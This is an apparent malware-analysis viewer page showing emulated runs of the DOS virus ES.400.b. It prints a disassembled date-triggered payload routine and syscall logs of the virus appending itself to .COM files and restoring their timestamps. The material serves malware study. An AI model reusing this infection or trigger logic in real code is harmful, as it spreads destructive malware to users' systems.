Sample viewer

vx.netlux.org/Virus.DOS.ES.400.b


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:31:38.207024002Z 42 PC: 12a76 | Get date
0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa1
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa1
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: lea dx, word ptr [0x255]
0x12a9d: int 0x21
0x12a9f: int 0x20
0x12aa1: mov ah, 0x4a
2018-12-17T22:31:38.20999938Z 74 PC: 12aa8 | Reallocate memory
2018-12-17T22:31:38.211436882Z 26 PC: 12ab2 | Set disk transfer address
2018-12-17T22:31:38.212484361Z 78 PC: 12abd | Find first file
2018-12-17T22:31:38.216825417Z 61 PC: 12afd | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:31:38.220896767Z 63 PC: 12b21 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:31:38.225165152Z 66 PC: 12b5c | Move file pointer
2018-12-17T22:31:38.226740471Z 64 PC: 12b67 | Write file or device (Write 401 bytes on handle 5)
2018-12-17T22:31:38.241218361Z 66 PC: 12b73 | Move file pointer
2018-12-17T22:31:38.242507661Z 64 PC: 12b7e | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:31:38.248816342Z 87 PC: 12adf | Get or set file date and time
2018-12-17T22:31:38.250590343Z 62 PC: 12ae3 | Close file
2018-12-17T22:31:38.258134628Z 79 PC: 12abd | Find next file
2018-12-17T22:31:38.260875195Z 61 PC: 12afd | Open file (Filename = 'PRINT.COM')
2018-12-17T22:31:38.268260621Z 63 PC: 12b21 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:31:38.275154988Z 66 PC: 12b5c | Move file pointer
2018-12-17T22:31:38.276399339Z 64 PC: 12b67 | Write file or device (Write 401 bytes on handle 5)
2018-12-17T22:31:38.279725352Z 66 PC: 12b73 | Move file pointer
2018-12-17T22:31:38.281352284Z 64 PC: 12b7e | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:31:38.287709719Z 87 PC: 12adf | Get or set file date and time
2018-12-17T22:31:38.290152467Z 62 PC: 12ae3 | Close file
2018-12-17T22:31:38.297830767Z 79 PC: 12abd | Find next file
2018-12-17T22:31:38.301235852Z 61 PC: 12afd | Open file (Filename = 'HELLO.COM')
2018-12-17T22:31:38.308211712Z 63 PC: 12b21 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:31:38.315125958Z 66 PC: 12b5c | Move file pointer
2018-12-17T22:31:38.316631915Z 64 PC: 12b67 | Write file or device (Write 401 bytes on handle 5)
2018-12-17T22:31:38.320342514Z 66 PC: 12b73 | Move file pointer
2018-12-17T22:31:38.321970248Z 64 PC: 12b7e | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:31:38.324741113Z 87 PC: 12adf | Get or set file date and time
2018-12-17T22:31:38.326698369Z 62 PC: 12ae3 | Close file
2018-12-17T22:31:38.335923974Z 79 PC: 12abd | Find next file
2018-12-17T22:31:38.339078757Z 61 PC: 12afd | Open file (Filename = 'PHANG.COM')
2018-12-17T22:31:38.346155882Z 63 PC: 12b21 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:31:38.354712182Z 66 PC: 12b5c | Move file pointer
2018-12-17T22:31:38.356438558Z 64 PC: 12b67 | Write file or device (Write 401 bytes on handle 5)
2018-12-17T22:31:38.361397769Z 66 PC: 12b73 | Move file pointer
2018-12-17T22:31:38.363740529Z 64 PC: 12b7e | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:31:38.36627279Z 87 PC: 12adf | Get or set file date and time
2018-12-17T22:31:38.368013742Z 62 PC: 12ae3 | Close file
2018-12-17T22:31:38.376221854Z 79 PC: 12abd | Find next file
2018-12-17T22:31:38.37877579Z 61 PC: 12afd | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:31:38.384966618Z 63 PC: 12b21 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:31:38.391878843Z 66 PC: 12b5c | Move file pointer
2018-12-17T22:31:38.393335953Z 64 PC: 12b67 | Write file or device (Write 401 bytes on handle 5)
2018-12-17T22:31:38.39580981Z 66 PC: 12b73 | Move file pointer
2018-12-17T22:31:38.397529211Z 64 PC: 12b7e | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:31:38.400026325Z 87 PC: 12adf | Get or set file date and time
2018-12-17T22:31:38.401363623Z 62 PC: 12ae3 | Close file
2018-12-17T22:31:38.409647394Z 79 PC: 12abd | Find next file
2018-12-17T22:31:38.412396781Z 61 PC: 12afd | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:31:38.419509203Z 63 PC: 12b21 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:31:38.436870819Z 66 PC: 12b5c | Move file pointer
2018-12-17T22:31:38.438405843Z 64 PC: 12b67 | Write file or device (Write 401 bytes on handle 5)
2018-12-17T22:31:38.446387883Z 66 PC: 12b73 | Move file pointer
2018-12-17T22:31:38.447894478Z 64 PC: 12b7e | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:31:38.454669013Z 87 PC: 12adf | Get or set file date and time
2018-12-17T22:31:38.456266032Z 62 PC: 12ae3 | Close file
2018-12-17T22:31:38.464072028Z 79 PC: 12abd | Find next file
2018-12-17T22:31:38.467655873Z 61 PC: 12afd | Open file (Filename = 'PAH.COM')
2018-12-17T22:31:38.472314874Z 63 PC: 12b21 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:31:38.476511626Z 66 PC: 12b5c | Move file pointer
2018-12-17T22:31:38.478426451Z 64 PC: 12b67 | Write file or device (Write 401 bytes on handle 5)
2018-12-17T22:31:38.482163934Z 66 PC: 12b73 | Move file pointer
2018-12-17T22:31:38.483733876Z 64 PC: 12b7e | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:31:38.48693718Z 87 PC: 12adf | Get or set file date and time
2018-12-17T22:31:38.488428994Z 62 PC: 12ae3 | Close file
2018-12-17T22:31:38.495917522Z 79 PC: 12abd | Find next file
2018-12-17T22:31:38.499504993Z 61 PC: 12afd | Open file (Filename = 'TEST.COM')
2018-12-17T22:31:38.506042745Z 63 PC: 12b21 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:31:38.508551584Z 62 PC: 12ae3 | Close file
2018-12-17T22:31:38.511551446Z 79 PC: 12abd | Find next file
2018-12-17T22:31:38.514307729Z 26 PC: 12ac6 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5650,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:07.195510084Z 42 PC: 12a76 | Get date
0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa1
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa1
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: lea dx, word ptr [0x255]
0x12a9d: int 0x21
0x12a9f: int 0x20
0x12aa1: mov ah, 0x4a
2018-12-25T11:55:07.198981071Z 74 PC: 12aa8 | Reallocate memory
2018-12-25T11:55:07.200738655Z 26 PC: 12ab2 | Set disk transfer address
2018-12-25T11:55:07.202154163Z 78 PC: 12abd | Find first file
2018-12-25T11:55:07.208847844Z 61 PC: 12afd | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:07.213662226Z 63 PC: 12b21 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:55:07.218202209Z 66 PC: 12b5c | Move file pointer
2018-12-25T11:55:07.219291482Z 64 PC: 12b67 | Write file or device (Write 401 bytes on handle 5)
2018-12-25T11:55:07.230555739Z 66 PC: 12b73 | Move file pointer
2018-12-25T11:55:07.233496663Z 64 PC: 12b7e | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:55:07.238031059Z 87 PC: 12adf | Get or set file date and time
2018-12-25T11:55:07.239884972Z 62 PC: 12ae3 | Close file
2018-12-25T11:55:07.244822593Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:07.246788346Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:07.257460264Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:07.264217933Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:07.26566683Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:07.269008503Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:07.27068607Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:07.273688749Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:07.276249517Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:07.28414182Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:07.287341925Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:07.29437017Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:07.301073766Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:07.302521361Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:07.305433538Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:07.30713815Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:07.310062428Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:07.313206131Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:07.321095104Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:07.323885606Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:07.331684284Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:07.338527419Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:07.340115645Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:07.343338127Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:07.345724231Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:07.349390331Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:07.351137689Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:07.368504012Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:07.371312274Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:07.377982714Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:07.384926062Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:07.386304017Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:07.388978812Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:07.3909837Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:07.393427837Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:07.394825793Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:07.403201011Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:07.405822665Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:07.412232078Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:07.41964448Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:07.421075696Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:07.429737067Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:07.432636003Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:07.439088073Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:07.440592042Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:07.450144059Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:07.452984583Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:07.459542332Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:07.467127217Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:07.468776785Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:07.471718587Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:07.474205055Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:07.476955166Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:07.478528419Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:07.486599496Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:07.489515351Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:07.496890347Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:07.500314073Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:07.502759143Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:07.505402289Z 26 PC: 12ac6 | Set disk transfer address

{"DateBased":true,"Day":27,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5650,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:07.598256335Z 42 PC: 12a76 | Get date
0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa1
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa1
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: lea dx, word ptr [0x255]
0x12a9d: int 0x21
0x12a9f: int 0x20
0x12aa1: mov ah, 0x4a
2018-12-25T11:55:07.601805388Z 9 PC: 12a9f | Display string (String= 'Your drives were on the Estonia... They DIDN'T survive!!! ')

{"DateBased":true,"Day":29,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5650,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:07.963629385Z 42 PC: 12a76 | Get date
0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa1
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa1
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: lea dx, word ptr [0x255]
0x12a9d: int 0x21
0x12a9f: int 0x20
0x12aa1: mov ah, 0x4a
2018-12-25T11:55:07.966194198Z 74 PC: 12aa8 | Reallocate memory
2018-12-25T11:55:07.967820185Z 26 PC: 12ab2 | Set disk transfer address
2018-12-25T11:55:07.969072694Z 78 PC: 12abd | Find first file
2018-12-25T11:55:07.975568333Z 61 PC: 12afd | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:07.982088366Z 63 PC: 12b21 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:55:07.988615967Z 66 PC: 12b5c | Move file pointer
2018-12-25T11:55:07.990090017Z 64 PC: 12b67 | Write file or device (Write 401 bytes on handle 5)
2018-12-25T11:55:08.004696134Z 66 PC: 12b73 | Move file pointer
2018-12-25T11:55:08.006088974Z 64 PC: 12b7e | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:55:08.012437342Z 87 PC: 12adf | Get or set file date and time
2018-12-25T11:55:08.01446777Z 62 PC: 12ae3 | Close file
2018-12-25T11:55:08.021951908Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.024641032Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.039113774Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.0463534Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:08.048112799Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:08.053181701Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:08.055041493Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:08.057885477Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:08.060271028Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.068220257Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.07120607Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.078318827Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.085339764Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:08.087050704Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:08.090607938Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:08.091860884Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:08.094270757Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:08.095876121Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.103311064Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.106719732Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.113947736Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.120630439Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:08.121910214Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:08.125186603Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:08.126450848Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:08.128922695Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:08.130466025Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.13792461Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.140423282Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.146622447Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.153939109Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:08.155287207Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:08.157812776Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:08.159504426Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:08.162090696Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:08.163618677Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.172298284Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.175172686Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.181698962Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.189435726Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:08.19108471Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:08.199132749Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:08.201702691Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:08.208310419Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:08.209983576Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.218246848Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.221038378Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.227515439Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.235117947Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:08.23662934Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:08.240074325Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:08.242461082Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:08.24518878Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:08.246771639Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.254689738Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.257614778Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.264391782Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.267879656Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.270269525Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.272779452Z 26 PC: 12ac6 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5650,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:08.555066912Z 42 PC: 12a76 | Get date
0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa1
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa1
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: lea dx, word ptr [0x255]
0x12a9d: int 0x21
0x12a9f: int 0x20
0x12aa1: mov ah, 0x4a
2018-12-25T11:55:08.557969823Z 74 PC: 12aa8 | Reallocate memory
2018-12-25T11:55:08.559336394Z 26 PC: 12ab2 | Set disk transfer address
2018-12-25T11:55:08.560384688Z 78 PC: 12abd | Find first file
2018-12-25T11:55:08.566824147Z 61 PC: 12afd | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:08.573196624Z 63 PC: 12b21 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:55:08.580038289Z 66 PC: 12b5c | Move file pointer
2018-12-25T11:55:08.581629129Z 64 PC: 12b67 | Write file or device (Write 401 bytes on handle 5)
2018-12-25T11:55:08.608801045Z 66 PC: 12b73 | Move file pointer
2018-12-25T11:55:08.610415019Z 64 PC: 12b7e | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:55:08.617114815Z 87 PC: 12adf | Get or set file date and time
2018-12-25T11:55:08.619340949Z 62 PC: 12ae3 | Close file
2018-12-25T11:55:08.627138562Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.629903197Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.637327405Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.644211072Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:08.645903956Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:08.649709652Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:08.651269532Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:08.654836865Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:08.657290428Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.666057611Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.66889864Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.676439829Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.688811193Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:08.69112604Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:08.695129772Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:08.696739701Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:08.699631263Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:08.702419165Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.710499925Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.71324978Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.720682717Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.732209237Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:08.733950607Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:08.737634133Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:08.739578828Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:08.742704332Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:08.745660355Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.754034934Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.757055371Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.764038982Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.771277478Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:08.773375201Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:08.77659425Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:08.77880927Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:08.781429425Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:08.782976255Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.79073296Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.794444289Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.801097885Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.808359794Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:08.810008217Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:08.818167628Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:08.820711289Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:08.827422615Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:08.829201258Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.837830893Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.840613255Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.847011305Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.854432652Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:08.855891553Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:08.859545622Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:08.861824065Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:08.864431149Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:08.865910829Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.874267656Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.876869689Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:08.883248305Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:08.886382999Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:08.888238472Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:08.89067088Z 26 PC: 12ac6 | Set disk transfer address

{"DateBased":true,"Day":27,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5650,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:08.863126007Z 42 PC: 12a76 | Get date
0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa1
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa1
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: lea dx, word ptr [0x255]
0x12a9d: int 0x21
0x12a9f: int 0x20
0x12aa1: mov ah, 0x4a
2018-12-25T11:55:08.867037474Z 9 PC: 12a9f | Display string (String= 'Your drives were on the Estonia... They DIDN'T survive!!! ')

{"DateBased":true,"Day":29,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5650,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:09.424623831Z 42 PC: 12a76 | Get date
0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa1
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa1
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: lea dx, word ptr [0x255]
0x12a9d: int 0x21
0x12a9f: int 0x20
0x12aa1: mov ah, 0x4a
2018-12-25T11:55:09.427335539Z 74 PC: 12aa8 | Reallocate memory
2018-12-25T11:55:09.428929723Z 26 PC: 12ab2 | Set disk transfer address
2018-12-25T11:55:09.429970554Z 78 PC: 12abd | Find first file
2018-12-25T11:55:09.43674995Z 61 PC: 12afd | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:09.452587028Z 63 PC: 12b21 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:55:09.460509297Z 66 PC: 12b5c | Move file pointer
2018-12-25T11:55:09.461891388Z 64 PC: 12b67 | Write file or device (Write 401 bytes on handle 5)
2018-12-25T11:55:09.478120378Z 66 PC: 12b73 | Move file pointer
2018-12-25T11:55:09.479579499Z 64 PC: 12b7e | Write file or device (Write 5 bytes on handle 5)
